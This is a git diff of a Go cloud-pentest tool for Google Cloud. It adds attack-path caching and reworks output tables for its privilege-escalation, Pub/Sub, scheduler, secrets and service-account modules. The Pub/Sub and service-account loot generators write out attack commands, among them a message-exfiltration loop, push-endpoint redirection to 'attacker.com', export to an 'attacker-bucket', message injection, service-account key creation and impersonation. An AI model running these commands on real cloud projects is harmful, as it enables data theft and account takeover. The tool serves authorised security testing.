} // Store results @@ -226,13 +262,14 @@ func (m *PrivescModule) writeOutput(ctx context.Context, logger internal.Logger) func (m *PrivescModule) getHeader() []string { return []string{ - "Scope Type", - "Scope ID", - "Scope Name", - "Source Principal", - "Source Principal Type", - "Action (Method)", + "Project", + "Source", + "Principal Type", + "Principal", + "Method", "Target Resource", + "Category", + "Binding Scope", "Permissions", } } @@ -245,15 +282,38 @@ func (m *PrivescModule) pathsToTableBody(paths []attackpathservice.AttackPath) [ scopeName = path.ScopeID } + // Format binding scope (where the IAM binding is defined) + bindingScope := "Project" + if path.ScopeType == "organization" { + bindingScope = "Organization" + } else if path.ScopeType == "folder" { + bindingScope = "Folder" + } else if path.ScopeType == "resource" { + bindingScope = "Resource" + } + + // Format target resource + targetResource := path.TargetResource + if targetResource == "" || targetResource == "*" { + targetResource = "*" + } + + // Format permissions + permissions := strings.Join(path.Permissions, ", ") + if permissions == "" { + permissions = "-" + } + body = append(body, []string{ - path.ScopeType, - path.ScopeID, scopeName, - path.Principal, + path.ScopeType, path.PrincipalType, + path.Principal, path.Method, - path.TargetResource, - strings.Join(path.Permissions, ", "), + targetResource, + path.Category, + bindingScope, + permissions, }) } return body @@ -384,3 +444,87 @@ func (m *PrivescModule) writeFlatOutput(ctx context.Context, logger internal.Log logger.ErrorM(fmt.Sprintf("Error writing output: %v", err), globals.GCP_PRIVESC_MODULE_NAME) } } + +// saveToAttackPathCache saves attack path data to disk cache +func (m *PrivescModule) saveToAttackPathCache(ctx context.Context, data *attackpathservice.CombinedAttackPathData, logger internal.Logger) { + // Skip saving if running under all-checks (consolidated save happens at the end) + if gcpinternal.IsAllChecksMode(ctx) { + logger.InfoM("Skipping individual cache save (all-checks mode)", globals.GCP_PRIVESC_MODULE_NAME) + return + } + + cache := gcpinternal.NewAttackPathCache() + + // Populate cache with paths from all scopes + var pathInfos []gcpinternal.AttackPathInfo + for _, path := range data.AllPaths { + pathInfos = append(pathInfos, gcpinternal.AttackPathInfo{ + Principal: path.Principal, + PrincipalType: path.PrincipalType, + Method: path.Method, + PathType: gcpinternal.AttackPathType(path.PathType), + Category: path.Category, + RiskLevel: path.RiskLevel, + Target: path.TargetResource, + Permissions: path.Permissions, + ScopeType: path.ScopeType, + ScopeID: path.ScopeID, + }) + } + cache.PopulateFromPaths(pathInfos) + cache.SetRawData(data) + + // Save to disk + err := gcpinternal.SaveAttackPathCacheToFile(cache, m.ProjectIDs, m.OutputDirectory, m.Account, "1.0") + if err != nil { + logger.InfoM(fmt.Sprintf("Could not save attack path cache: %v", err), globals.GCP_PRIVESC_MODULE_NAME) + } else { + privesc, exfil, lateral := cache.GetStats() + logger.InfoM(fmt.Sprintf("Saved attack path cache to disk (%d privesc, %d exfil, %d lateral)", + privesc, exfil, lateral), globals.GCP_PRIVESC_MODULE_NAME) + } +} + +// filterPrivescPaths filters a CombinedAttackPathData to only include privesc paths +// This is used when the cache contains all attack path types but privesc only needs privesc +func filterPrivescPaths(data *attackpathservice.CombinedAttackPathData) *attackpathservice.CombinedAttackPathData { + result := &attackpathservice.CombinedAttackPathData{ + OrgPaths: []attackpathservice.AttackPath{}, + FolderPaths: []attackpathservice.AttackPath{}, + ProjectPaths: []attackpathservice.AttackPath{}, + ResourcePaths: []attackpathservice.AttackPath{}, + AllPaths: []attackpathservice.AttackPath{}, + OrgNames: data.OrgNames, + FolderNames: data.FolderNames, + OrgIDs: data.OrgIDs, + } + + // Filter each path slice to only include privesc paths + for _, path := range data.OrgPaths { + if path.PathType == "privesc" { + result.OrgPaths = append(result.OrgPaths, path) + } + } + for _, path := range data.FolderPaths { + if path.PathType == "privesc" { + result.FolderPaths = append(result.FolderPaths, path) + } + } + for _, path := range data.ProjectPaths { + if path.PathType == "privesc" { + result.ProjectPaths = append(result.ProjectPaths, path) + } + } + for _, path := range data.ResourcePaths { + if path.PathType == "privesc" { + result.ResourcePaths = append(result.ResourcePaths, path) + } + } + for _, path := range data.AllPaths { + if path.PathType == "privesc" { + result.AllPaths = append(result.AllPaths, path) + } + } + + return result +} diff --git a/gcp/commands/pubsub.go b/gcp/commands/pubsub.go index 35698791..c6a3085c 100644 --- a/gcp/commands/pubsub.go +++ b/gcp/commands/pubsub.go @@ -223,17 +223,33 @@ func (m *PubSubModule) addTopicToLoot(projectID string, topic PubSubService.Topi return } + // Check for public access + publicAccess := "" + for _, binding := range topic.IAMBindings { + if shared.IsPublicPrincipal(binding.Member) { + publicAccess = " [PUBLIC ACCESS]" + break + } + } + lootFile.Contents += fmt.Sprintf( - "## Topic: %s (Project: %s)\n"+ + "# ==========================================\n"+ + "# TOPIC: %s%s\n"+ + "# ==========================================\n"+ + "# Project: %s\n"+ "# Subscriptions: %d\n", - topic.Name, topic.ProjectID, - topic.SubscriptionCount, + topic.Name, publicAccess, + topic.ProjectID, topic.SubscriptionCount, ) if topic.KmsKeyName != "" { lootFile.Contents += fmt.Sprintf("# KMS Key: %s\n", topic.KmsKeyName) } + if topic.SchemaSettings != "" { + lootFile.Contents += fmt.Sprintf("# Schema: %s\n", topic.SchemaSettings) + } + if len(topic.IAMBindings) > 0 { lootFile.Contents += "# IAM Bindings:\n" for _, binding := range topic.IAMBindings { @@ -241,19 +257,51 @@ func (m *PubSubModule) addTopicToLoot(projectID string, topic PubSubService.Topi } } - lootFile.Contents += fmt.Sprintf( - "\n# Describe topic:\n"+ - "gcloud pubsub topics describe %s --project=%s\n\n"+ - "# Get IAM policy:\n"+ - "gcloud pubsub topics get-iam-policy %s --project=%s\n\n"+ - "# List subscriptions:\n"+ - "gcloud pubsub topics list-subscriptions %s --project=%s\n\n"+ - "# Publish a message:\n"+ - "gcloud pubsub topics publish %s --message='test' --project=%s\n\n", + lootFile.Contents += fmt.Sprintf(` +# === ENUMERATION COMMANDS === + +# Describe topic +gcloud pubsub topics describe %s --project=%s + +# Get IAM policy +gcloud pubsub topics get-iam-policy %s --project=%s + +# List all subscriptions for this topic +gcloud pubsub topics list-subscriptions %s --project=%s + +# List snapshots for this topic +gcloud pubsub snapshots list --filter="topic:%s" --project=%s + +# === EXPLOITATION COMMANDS === + +# Publish a test message (requires pubsub.topics.publish) +gcloud pubsub topics publish %s --message='{"test": "message"}' --project=%s + +# Publish message with attributes +gcloud pubsub topics publish %s --message='test' --attribute='key1=value1,key2=value2' --project=%s + +# Publish from file +# echo '{"sensitive": "data"}' > message.json +# gcloud pubsub topics publish %s --message="$(cat message.json)" --project=%s + +# === ATTACK SCENARIOS === + +# Message Injection: If you can publish, inject malicious messages +# gcloud pubsub topics publish %s --message='{"cmd": "malicious_command"}' --project=%s + +# Create a new subscription to eavesdrop on messages (requires pubsub.subscriptions.create) +# gcloud pubsub subscriptions create attacker-sub-%s --topic=%s --project=%s + +`, + topic.Name, topic.ProjectID, + topic.Name, topic.ProjectID, + topic.Name, topic.ProjectID, topic.Name, topic.ProjectID, topic.Name, topic.ProjectID, topic.Name, topic.ProjectID, topic.Name, topic.ProjectID, + topic.Name, topic.ProjectID, + topic.Name, topic.Name, topic.ProjectID, ) } @@ -263,11 +311,23 @@ func (m *PubSubModule) addSubscriptionToLoot(projectID string, sub PubSubService return } + // Check for public access + publicAccess := "" + for _, binding := range sub.IAMBindings { + if shared.IsPublicPrincipal(binding.Member) { + publicAccess = " [PUBLIC ACCESS]" + break + } + } + lootFile.Contents += fmt.Sprintf( - "## Subscription: %s (Project: %s)\n"+ + "# ==========================================\n"+ + "# SUBSCRIPTION: %s%s\n"+ + "# ==========================================\n"+ + "# Project: %s\n"+ "# Topic: %s\n", - sub.Name, sub.ProjectID, - sub.Topic, + sub.Name, publicAccess, + sub.ProjectID, sub.Topic, ) // Cross-project info @@ -275,6 +335,17 @@ func (m *PubSubModule) addSubscriptionToLoot(projectID string, sub PubSubService lootFile.Contents += fmt.Sprintf("# Cross-Project: Yes (topic in %s)\n", sub.TopicProject) } + // Subscription type + subType := "Pull" + if sub.PushEndpoint != "" { + subType = "Push" + } else if sub.BigQueryTable != "" { + subType = "BigQuery Export" + } else if sub.CloudStorageBucket != "" { + subType = "Cloud Storage Export" + } + lootFile.Contents += fmt.Sprintf("# Type: %s\n", subType) + // Push endpoint info if sub.PushEndpoint != "" { lootFile.Contents += fmt.Sprintf( @@ -302,6 +373,11 @@ func (m *PubSubModule) addSubscriptionToLoot(projectID string, sub PubSubService ) } + // Filter + if sub.Filter != "" { + lootFile.Contents += fmt.Sprintf("# Filter: %s\n", sub.Filter) + } + // IAM bindings if len(sub.IAMBindings) > 0 { lootFile.Contents += "# IAM Bindings:\n" @@ -310,27 +386,171 @@ func (m *PubSubModule) addSubscriptionToLoot(projectID string, sub PubSubService } } - lootFile.Contents += fmt.Sprintf( - "\n# Describe subscription:\n"+ - "gcloud pubsub subscriptions describe %s --project=%s\n\n"+ - "# Get IAM policy:\n"+ - "gcloud pubsub subscriptions get-iam-policy %s --project=%s\n\n"+ - "# Pull messages:\n"+ - "gcloud pubsub subscriptions pull %s --project=%s --limit=10 --auto-ack\n\n", + lootFile.Contents += fmt.Sprintf(` +# === ENUMERATION COMMANDS === + +# Describe subscription +gcloud pubsub subscriptions describe %s --project=%s + +# Get IAM policy +gcloud pubsub subscriptions get-iam-policy %s --project=%s + +# List snapshots for this subscription +gcloud pubsub snapshots list --project=%s + +# === EXPLOITATION COMMANDS === + +# Pull messages WITHOUT acknowledging (peek at messages, they stay in queue) +gcloud pubsub subscriptions pull %s --project=%s --limit=100 + +# Pull and acknowledge messages (removes them from queue - destructive!) +gcloud pubsub subscriptions pull %s --project=%s --limit=100 --auto-ack + +# Pull messages with wait (useful for real-time monitoring) +# gcloud pubsub subscriptions pull %s --project=%s --limit=10 --wait + +# === MESSAGE EXFILTRATION === + +# Continuous message pulling loop (exfiltrate all messages) +# while true; do gcloud pubsub subscriptions pull %s --project=%s --limit=100 --auto-ack --format=json >> exfiltrated_messages.json; sleep 1; done + +# Pull and save to file +# gcloud pubsub subscriptions pull %s --project=%s --limit=1000 --format=json > messages.json + +# === SNAPSHOT & SEEK ATTACKS === + +# Create a snapshot of current subscription state (requires pubsub.snapshots.create) +# gcloud pubsub snapshots create snapshot-%s --subscription=%s --project=%s + +# Seek to beginning of retention period (replay all retained messages) +# gcloud pubsub subscriptions seek %s --time="2024-01-01T00:00:00Z" --project=%s + +# Seek to a snapshot (replay messages from snapshot point) +# gcloud pubsub subscriptions seek %s --snapshot=snapshot-%s --project=%s + +`, + sub.Name, sub.ProjectID, + sub.Name, sub.ProjectID, + sub.ProjectID, sub.Name, sub.ProjectID, sub.Name, sub.ProjectID, sub.Name, sub.ProjectID, + sub.Name, sub.ProjectID, + sub.Name, sub.ProjectID, + sub.Name, sub.Name, sub.ProjectID, + sub.Name, sub.ProjectID, + sub.Name, sub.Name, sub.ProjectID, ) - // BigQuery command + // Push endpoint specific attacks + if sub.PushEndpoint != "" { + lootFile.Contents += fmt.Sprintf(`# === PUSH ENDPOINT ATTACKS === + +# Current push endpoint: %s +# Push SA: %s + +# Modify push endpoint to redirect messages to attacker-controlled server (requires pubsub.subscriptions.update) +# gcloud pubsub subscriptions modify-push-config %s --project=%s --push-endpoint="https://attacker.com/webhook" + +# Remove push config (convert to pull subscription for easier exfiltration) +# gcloud pubsub subscriptions modify-push-config %s --project=%s --push-endpoint="" + +# Change push authentication (OIDC token attack) +# gcloud pubsub subscriptions modify-push-config %s --project=%s --push-endpoint="%s" --push-auth-service-account="attacker-sa@attacker-project.iam.gserviceaccount.com" + +`, + sub.PushEndpoint, sub.PushServiceAccount, + sub.Name, sub.ProjectID, + sub.Name, sub.ProjectID, + sub.Name, sub.ProjectID, sub.PushEndpoint, + ) + } + + // BigQuery export attacks if sub.BigQueryTable != "" { - lootFile.Contents += fmt.Sprintf("# Query BigQuery export:\nbq show %s\n\n", sub.BigQueryTable) + lootFile.Contents += fmt.Sprintf(`# === BIGQUERY EXPORT ATTACKS === + +# Current export table: %s + +# Query exported messages from BigQuery +bq query --use_legacy_sql=false 'SELECT * FROM %s LIMIT 1000' + +# Export BigQuery table to GCS for bulk download +# bq extract --destination_format=NEWLINE_DELIMITED_JSON '%s' gs://attacker-bucket/exported_messages/*.json + +# Show table schema (understand message structure) +bq show --schema %s + +`, + sub.BigQueryTable, + strings.Replace(sub.BigQueryTable, ":", ".", 1), + sub.BigQueryTable, + sub.BigQueryTable, + ) } - // GCS command + // GCS export attacks if sub.CloudStorageBucket != "" { - lootFile.Contents += fmt.Sprintf("# List GCS export:\ngsutil ls gs://%s/\n\n", sub.CloudStorageBucket) + lootFile.Contents += fmt.Sprintf(`# === CLOUD STORAGE EXPORT ATTACKS === + +# Current export bucket: %s + +# List exported message files +gsutil ls -la gs://%s/ + +# Download all exported messages +gsutil -m cp -r gs://%s/ ./exported_messages/ + +# Stream new exports as they arrive +# gsutil -m rsync -r gs://%s/ ./exported_messages/ + +`, + sub.CloudStorageBucket, + sub.CloudStorageBucket, + sub.CloudStorageBucket, + sub.CloudStorageBucket, + ) + } + + // Dead letter topic attacks + if sub.DeadLetterTopic != "" { + lootFile.Contents += fmt.Sprintf(`# === DEAD LETTER TOPIC ATTACKS === + +# Dead letter topic: %s +# Messages that fail delivery %d times go here + +# Create subscription to dead letter topic to capture failed messages +# gcloud pubsub subscriptions create dlq-eavesdrop --topic=%s --project=%s + +# Dead letters often contain sensitive data from failed processing + +`, + sub.DeadLetterTopic, sub.MaxDeliveryAttempts, + sub.DeadLetterTopic, sub.ProjectID, + ) } + + // Cross-project attack scenarios + if sub.TopicProject != "" && sub.TopicProject != sub.ProjectID { + lootFile.Contents += fmt.Sprintf(`# === CROSS-PROJECT ATTACK SCENARIOS === + +# This subscription reads from topic in project: %s +# This indicates a trust relationship between projects + +# Check if you have access to the source topic +gcloud pubsub topics describe %s --project=%s + +# If you can publish to the source topic, you can inject messages +# gcloud pubsub topics publish %s --message='injected' --project=%s + +`, + sub.TopicProject, + sub.Topic, sub.TopicProject, + sub.Topic, sub.TopicProject, + ) + } + + lootFile.Contents += "\n" } // ------------------------------ @@ -346,41 +566,101 @@ func (m *PubSubModule) writeOutput(ctx context.Context, logger internal.Logger) func (m *PubSubModule) getTopicsHeader() []string { return []string{ - "Project Name", "Project ID", "Topic Name", "Subscriptions", - "KMS Key", "Retention", "Resource Role", "Resource Principal", + "Project", + "Topic", + "Subscriptions", + "Schema", + "KMS Key", + "Retention", + "Public Publish", + "IAM Binding Role", + "IAM Binding Principal", } } func (m *PubSubModule) getSubsHeader() []string { return []string{ - "Project Name", "Project ID", "Subscription", "Topic", "Type", - "Push Endpoint / Export", "Cross-Project", "Dead Letter", "Resource Role", "Resource Principal", + "Project", + "Subscription", + "Topic", + "Topic Project", + "Type", + "Destination", + "Filter", + "Ack Deadline", + "Retention", + "Dead Letter", + "Public Subscribe", + "IAM Binding Role", + "IAM Binding Principal", } } func (m *PubSubModule) topicsToTableBody(topics []PubSubService.TopicInfo) [][]string { var body [][]string for _, topic := range topics { + schema := "-" + if topic.SchemaSettings != "" { + schema = topic.SchemaSettings + } + kmsKey := "-" if topic.KmsKeyName != "" { - kmsKey = topic.KmsKeyName + // Extract just the key name from full path for readability + parts := strings.Split(topic.KmsKeyName, "/") + if len(parts) > 0 { + kmsKey = parts[len(parts)-1] + } else { + kmsKey = topic.KmsKeyName + } } + retention := "-" if topic.MessageRetentionDuration != "" { retention = topic.MessageRetentionDuration } + // Check for public publish access + publicPublish := "No" + for _, binding := range topic.IAMBindings { + if shared.IsPublicPrincipal(binding.Member) { + // Check if role allows publishing + if strings.Contains(binding.Role, "publisher") || + strings.Contains(binding.Role, "admin") || + binding.Role == "roles/pubsub.editor" || + binding.Role == "roles/owner" || + binding.Role == "roles/editor" { + publicPublish = "Yes" + break + } + } + } + if len(topic.IAMBindings) > 0 { for _, binding := range topic.IAMBindings { body = append(body, []string{ - m.GetProjectName(topic.ProjectID), topic.ProjectID, topic.Name, - fmt.Sprintf("%d", topic.SubscriptionCount), kmsKey, retention, binding.Role, binding.Member, + m.GetProjectName(topic.ProjectID), + topic.Name, + fmt.Sprintf("%d", topic.SubscriptionCount), + schema, + kmsKey, + retention, + publicPublish, + binding.Role, + binding.Member, }) } } else { body = append(body, []string{ - m.GetProjectName(topic.ProjectID), topic.ProjectID, topic.Name, - fmt.Sprintf("%d", topic.SubscriptionCount), kmsKey, retention, "-", "-", + m.GetProjectName(topic.ProjectID), + topic.Name, + fmt.Sprintf("%d", topic.SubscriptionCount), + schema, + kmsKey, + retention, + publicPublish, + "-", + "-", }) } } @@ -403,9 +683,24 @@ func (m *PubSubModule) subsToTableBody(subs []PubSubService.SubscriptionInfo) [] destination = sub.CloudStorageBucket } - crossProject := "-" + topicProject := "-" if sub.TopicProject != "" && sub.TopicProject != sub.ProjectID { - crossProject = sub.TopicProject + topicProject = sub.TopicProject + } + + filter := "-" + if sub.Filter != "" { + filter = sub.Filter + } + + ackDeadline := "-" + if sub.AckDeadlineSeconds > 0 { + ackDeadline = fmt.Sprintf("%ds", sub.AckDeadlineSeconds) + } + + retention := "-" + if sub.MessageRetention != "" { + retention = sub.MessageRetention } deadLetter := "-" @@ -413,17 +708,57 @@ func (m *PubSubModule) subsToTableBody(subs []PubSubService.SubscriptionInfo) [] deadLetter = sub.DeadLetterTopic } + // Check for public subscribe access + publicSubscribe := "No" + for _, binding := range sub.IAMBindings { + if shared.IsPublicPrincipal(binding.Member) { + // Check if role allows subscribing/consuming + if strings.Contains(binding.Role, "subscriber") || + strings.Contains(binding.Role, "admin") || + binding.Role == "roles/pubsub.editor" || + binding.Role == "roles/pubsub.viewer" || + binding.Role == "roles/owner" || + binding.Role == "roles/editor" || + binding.Role == "roles/viewer" { + publicSubscribe = "Yes" + break + } + } + } + if len(sub.IAMBindings) > 0 { for _, binding := range sub.IAMBindings { body = append(body, []string{ - m.GetProjectName(sub.ProjectID), sub.ProjectID, sub.Name, sub.Topic, subType, - destination, crossProject, deadLetter, binding.Role, binding.Member, + m.GetProjectName(sub.ProjectID), + sub.Name, + sub.Topic, + topicProject, + subType, + destination, + filter, + ackDeadline, + retention, + deadLetter, + publicSubscribe, + binding.Role, + binding.Member, }) } } else { body = append(body, []string{ - m.GetProjectName(sub.ProjectID), sub.ProjectID, sub.Name, sub.Topic, subType, - destination, crossProject, deadLetter, "-", "-", + m.GetProjectName(sub.ProjectID), + sub.Name, + sub.Topic, + topicProject, + subType, + destination, + filter, + ackDeadline, + retention, + deadLetter, + publicSubscribe, + "-", + "-", }) } } @@ -440,12 +775,16 @@ func (m *PubSubModule) buildTablesForProject(projectID string) []internal.TableF var tableFiles []internal.TableFile if len(topicsBody) > 0 { tableFiles = append(tableFiles, internal.TableFile{ - Name: globals.GCP_PUBSUB_MODULE_NAME + "-topics", Header: m.getTopicsHeader(), Body: topicsBody, + Name: globals.GCP_PUBSUB_MODULE_NAME + "-topics", + Header: m.getTopicsHeader(), + Body: topicsBody, }) } if len(subsBody) > 0 { tableFiles = append(tableFiles, internal.TableFile{ - Name: globals.GCP_PUBSUB_MODULE_NAME + "-subscriptions", Header: m.getSubsHeader(), Body: subsBody, + Name: globals.GCP_PUBSUB_MODULE_NAME + "-subscriptions", + Header: m.getSubsHeader(), + Body: subsBody, }) } return tableFiles @@ -510,12 +849,16 @@ func (m *PubSubModule) writeFlatOutput(ctx context.Context, logger internal.Logg var tableFiles []internal.TableFile if len(topicsBody) > 0 { tableFiles = append(tableFiles, internal.TableFile{ - Name: globals.GCP_PUBSUB_MODULE_NAME + "-topics", Header: m.getTopicsHeader(), Body: topicsBody, + Name: globals.GCP_PUBSUB_MODULE_NAME + "-topics", + Header: m.getTopicsHeader(), + Body: topicsBody, }) } if len(subsBody) > 0 { tableFiles = append(tableFiles, internal.TableFile{ - Name: globals.GCP_PUBSUB_MODULE_NAME + "-subscriptions", Header: m.getSubsHeader(), Body: subsBody, + Name: globals.GCP_PUBSUB_MODULE_NAME + "-subscriptions", + Header: m.getSubsHeader(), + Body: subsBody, }) } diff --git a/gcp/commands/scheduler.go b/gcp/commands/scheduler.go index 004c42f7..c557accd 100644 --- a/gcp/commands/scheduler.go +++ b/gcp/commands/scheduler.go @@ -246,7 +246,7 @@ func (m *SchedulerModule) getTableHeader() []string { "Target Type", "Target", "Service Account", - "Attack Paths", + "SA Attack Paths", "Last Run", } } @@ -265,7 +265,7 @@ func (m *SchedulerModule) jobsToTableBody(jobs []SchedulerService.JobInfo) [][]s } // Check attack paths (privesc/exfil/lateral) for the service account - attackPaths := "-" + attackPaths := "run --attack-paths" if m.AttackPathCache != nil && m.AttackPathCache.IsPopulated() { if sa != "-" { attackPaths = m.AttackPathCache.GetAttackSummary(sa) diff --git a/gcp/commands/secrets.go b/gcp/commands/secrets.go index 5dcae7f0..5f261712 100644 --- a/gcp/commands/secrets.go +++ b/gcp/commands/secrets.go @@ -38,8 +38,8 @@ Security Columns: - VersionDestroyTTL: Delayed destruction period for old versions Resource IAM Columns: -- Resource Role: The IAM role granted ON this secret (e.g., roles/secretmanager.secretAccessor) -- Resource Principal: The principal (user/SA/group) who has that role on this secret`, +- IAM Binding Role: The IAM role granted ON this secret (e.g., roles/secretmanager.secretAccessor) +- IAM Binding Principal: The principal (user/SA/group) who has that role on this secret`, Run: runGCPSecretsCommand, } @@ -50,10 +50,11 @@ type SecretsModule struct { gcpinternal.BaseGCPModule // Module-specific fields - per-project for hierarchical output - ProjectSecrets map[string][]SecretsService.SecretInfo // projectID -> secrets - LootMap map[string]map[string]*internal.LootFile // projectID -> loot files - client *secretmanager.Client - mu sync.Mutex + ProjectSecrets map[string][]SecretsService.SecretInfo // projectID -> secrets + LootMap map[string]map[string]*internal.LootFile // projectID -> loot files + AttackPathCache *gcpinternal.AttackPathCache // Cached attack path analysis results + client *secretmanager.Client + mu sync.Mutex } // ------------------------------ @@ -101,6 +102,19 @@ func runGCPSecretsCommand(cmd *cobra.Command, args []string) { // Module Execution // ------------------------------ func (m *SecretsModule) Execute(ctx context.Context, logger internal.Logger) { + // Get attack path cache from context (populated by all-checks or attack path analysis) + m.AttackPathCache = gcpinternal.GetAttackPathCacheFromContext(ctx) + + // If no context cache, try loading from disk cache + if m.AttackPathCache == nil || !m.AttackPathCache.IsPopulated() { + diskCache, metadata, err := gcpinternal.LoadAttackPathCacheFromFile(m.OutputDirectory, m.Account) + if err == nil && diskCache != nil && diskCache.IsPopulated() { + logger.InfoM(fmt.Sprintf("Using attack path cache from disk (created: %s)", + metadata.CreatedAt.Format("2006-01-02 15:04:05")), globals.GCP_SECRETS_MODULE_NAME) + m.AttackPathCache = diskCache + } + } + // Run enumeration with concurrency m.RunProjectEnumeration(ctx, logger, m.ProjectIDs, globals.GCP_SECRETS_MODULE_NAME, m.processProject) @@ -376,8 +390,7 @@ func (m *SecretsModule) writeFlatOutput(ctx context.Context, logger internal.Log // getTableHeader returns the secrets table header func (m *SecretsModule) getTableHeader() []string { return []string{ - "Project Name", - "Project ID", + "Project", "Name", "Encryption", "KMS Key", @@ -388,9 +401,10 @@ func (m *SecretsModule) getTableHeader() []string { "Expiration", "Destroy TTL", "Created", - "Resource Role", + "IAM Binding Role", "Principal Type", - "Resource Principal", + "IAM Binding Principal", + "Principal Attack Paths", } } @@ -439,9 +453,21 @@ func (m *SecretsModule) secretsToTableBody(secrets []SecretsService.SecretInfo) for _, binding := range secret.IAMBindings { for _, member := range binding.Members { memberType := shared.GetPrincipalType(member) + + // Check attack paths for service account principals + attackPaths := "-" + if memberType == "ServiceAccount" { + if m.AttackPathCache != nil && m.AttackPathCache.IsPopulated() { + // Extract email from member string (serviceAccount:email@...) + email := strings.TrimPrefix(member, "serviceAccount:") + attackPaths = m.AttackPathCache.GetAttackSummary(email) + } else { + attackPaths = "run --attack-paths" + } + } + body = append(body, []string{ m.GetProjectName(secret.ProjectID), - secret.ProjectID, secretName, secret.EncryptionType, kmsKey, @@ -455,6 +481,7 @@ func (m *SecretsModule) secretsToTableBody(secrets []SecretsService.SecretInfo) binding.Role, memberType, member, + attackPaths, }) } } @@ -462,7 +489,6 @@ func (m *SecretsModule) secretsToTableBody(secrets []SecretsService.SecretInfo) // Secret with no IAM bindings body = append(body, []string{ m.GetProjectName(secret.ProjectID), - secret.ProjectID, secretName, secret.EncryptionType, kmsKey, @@ -476,6 +502,7 @@ func (m *SecretsModule) secretsToTableBody(secrets []SecretsService.SecretInfo) "-", "-", "-", + "-", }) } } diff --git a/gcp/commands/serviceaccounts.go b/gcp/commands/serviceaccounts.go index 717cf169..c62205bc 100644 --- a/gcp/commands/serviceaccounts.go +++ b/gcp/commands/serviceaccounts.go @@ -100,6 +100,16 @@ func (m *ServiceAccountsModule) Execute(ctx context.Context, logger internal.Log // Get attack path cache from context (populated by all-checks or attack path analysis) m.AttackPathCache = gcpinternal.GetAttackPathCacheFromContext(ctx) + // If no context cache, try loading from disk cache + if m.AttackPathCache == nil || !m.AttackPathCache.IsPopulated() { + diskCache, metadata, err := gcpinternal.LoadAttackPathCacheFromFile(m.OutputDirectory, m.Account) + if err == nil && diskCache != nil && diskCache.IsPopulated() { + logger.InfoM(fmt.Sprintf("Using attack path cache from disk (created: %s)", + metadata.CreatedAt.Format("2006-01-02 15:04:05")), globals.GCP_SERVICEACCOUNTS_MODULE_NAME) + m.AttackPathCache = diskCache + } + } + // Run enumeration with concurrency m.RunProjectEnumeration(ctx, logger, m.ProjectIDs, globals.GCP_SERVICEACCOUNTS_MODULE_NAME, m.processProject) @@ -317,19 +327,53 @@ func (m *ServiceAccountsModule) addServiceAccountToLoot(projectID string, sa Ser keyFileName := strings.Split(sa.Email, "@")[0] + // Build summary info + dwdStatus := "No" + if sa.OAuth2ClientID != "" { + dwdStatus = fmt.Sprintf("Yes (Client ID: %s)", sa.OAuth2ClientID) + } + + defaultSAInfo := "No" + if sa.IsDefaultSA { + defaultSAInfo = fmt.Sprintf("Yes (%s)", sa.DefaultSAType) + } + lootFile.Contents += fmt.Sprintf( "# ==========================================\n"+ "# SERVICE ACCOUNT: %s\n"+ "# ==========================================\n"+ "# Project: %s\n"+ "# Display Name: %s\n"+ - "# Disabled: %v\n", + "# Disabled: %v\n"+ + "# Default SA: %s\n"+ + "# DWD Enabled: %s\n", sa.Email, projectID, sa.DisplayName, sa.Disabled, + defaultSAInfo, + dwdStatus, ) + // Add key summary + userKeyCount := 0 + googleKeyCount := 0 + for _, key := range sa.Keys { + if key.KeyType == "USER_MANAGED" { + userKeyCount++ + } else if key.KeyType == "SYSTEM_MANAGED" { + googleKeyCount++ + } + } + lootFile.Contents += fmt.Sprintf("# User Managed Keys: %d\n", userKeyCount) + lootFile.Contents += fmt.Sprintf("# Google Managed Keys: %d\n", googleKeyCount) + if sa.OldestKeyAge > 0 { + lootFile.Contents += fmt.Sprintf("# Oldest Key Age: %d days\n", sa.OldestKeyAge) + if sa.OldestKeyAge > 90 { + lootFile.Contents += "# WARNING: Key older than 90 days - rotation recommended\n" + } + } + // Add impersonation info if available if sa.ImpersonationInfo != nil { if len(sa.ImpersonationInfo.TokenCreators) > 0 { @@ -343,28 +387,87 @@ func (m *ServiceAccountsModule) addServiceAccountToLoot(projectID string, sa Ser } } - lootFile.Contents += fmt.Sprintf( - "\n# Impersonation commands:\n"+ - "gcloud auth print-access-token --impersonate-service-account=%s\n"+ - "gcloud auth print-identity-token --impersonate-service-account=%s\n\n"+ - "# Key creation commands:\n"+ - "gcloud iam service-accounts keys create %s-key.json --iam-account=%s --project=%s\n"+ - "gcloud auth activate-service-account --key-file=%s-key.json\n\n"+ - "# Describe service account:\n"+ - "gcloud iam service-accounts describe %s --project=%s\n\n"+ - "# Get IAM policy for this service account:\n"+ - "gcloud iam service-accounts get-iam-policy %s --project=%s\n\n", - sa.Email, - sa.Email, - keyFileName, - sa.Email, - projectID, - keyFileName, - sa.Email, - projectID, - sa.Email, - projectID, - ) + lootFile.Contents += fmt.Sprintf(` +# === ENUMERATION COMMANDS === + +# Describe service account +gcloud iam service-accounts describe %s --project=%s --format=json | jq '{email: .email, displayName: .displayName, disabled: .disabled, oauth2ClientId: .oauth2ClientId}' + +# List all keys with creation dates and expiration +gcloud iam service-accounts keys list --iam-account=%s --project=%s --format=json | jq -r '.[] | {keyId: .name | split("/") | last, keyType: .keyType, created: .validAfterTime, expires: .validBeforeTime}' + +# Get IAM policy - who can impersonate this SA +gcloud iam service-accounts get-iam-policy %s --project=%s --format=json | jq '.bindings[] | {role: .role, members: .members}' + +# Check project-level IAM bindings for this SA +gcloud projects get-iam-policy %s --format=json | jq -r '.bindings[] | select(.members[] | contains("%s")) | {role: .role, member: "%s"}' + +# Check what resources this SA can access +gcloud asset search-all-iam-policies --scope=projects/%s --query='policy:%s' --format=json | jq -r '.results[] | {resource: .resource, roles: [.policy.bindings[].role]}' + +`, sa.Email, projectID, + sa.Email, projectID, + sa.Email, projectID, + projectID, sa.Email, sa.Email, + projectID, sa.Email) + + lootFile.Contents += fmt.Sprintf(`# === EXPLOITATION COMMANDS === + +# Impersonate SA - get access token +gcloud auth print-access-token --impersonate-service-account=%s + +# Impersonate SA - get identity token (for Cloud Run/Functions) +gcloud auth print-identity-token --impersonate-service-account=%s + +# Create a new key for this SA (requires iam.serviceAccountKeys.create) +gcloud iam service-accounts keys create %s-key.json --iam-account=%s --project=%s + +# Activate the downloaded key +gcloud auth activate-service-account --key-file=%s-key.json + +# Test impersonation - list projects as this SA +gcloud projects list --impersonate-service-account=%s + +`, sa.Email, sa.Email, keyFileName, sa.Email, projectID, keyFileName, sa.Email) + + // Add DWD exploitation if enabled + if sa.OAuth2ClientID != "" { + lootFile.Contents += fmt.Sprintf(`# === DOMAIN-WIDE DELEGATION EXPLOITATION === +# This SA has DWD enabled - can impersonate Workspace users! +# OAuth2 Client ID: %s + +# Run the 